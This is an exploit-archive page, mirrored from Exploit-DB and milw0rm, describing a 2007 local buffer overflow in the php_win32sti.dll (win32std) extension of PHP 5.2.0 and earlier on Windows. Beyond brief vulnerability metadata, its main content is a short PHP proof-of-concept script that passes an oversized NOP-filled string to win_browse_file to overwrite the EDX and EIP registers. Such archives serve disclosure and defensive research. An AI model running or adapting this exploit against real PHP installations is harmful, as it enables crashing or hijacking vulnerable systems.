php_win32sti.dll PHP - exploit.company

vendor:

PHP

by:

boecke

N/A

CVSS

MEDIUM

Buffer Overflow

Unknown

CWE

Product Name: PHP

Affected Version From: <= 5.2.0

Affected Version To: <= 5.2.0

Patch Exists: NO

Related CWE: Unknown

CPE: php_win32sti.dll

Metasploit:

Other Scripts:

Platforms Tested: Windows

2007

php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow

The php_win32sti.dll extension in PHP version <= 5.2.0 for win32 allows a local buffer overflow, which can be exploited to control the EDX and EIP registers and potentially dictate program flow.

Mitigation:

Source

Exploit-DB raw data:

<?php
// ==================================================================================
//
//        php_win32sti.dll PHP <= 5.2.0 (win32) Buffer Overflow
//
//		[x] Discovery: boecke <boecke@herzeleid.net>
//		[x] Risk: Local Buffer Overflow (Medium - High Risk)
//		[x] Notes: EDX and EIP are able to be controlled and therefore
//			     have the potential to dictate program flow.
//
//		[x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================

if ( !extension_loaded("win32std") )
{
	die;
}

win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );

?>

# milw0rm.com [2007-08-18]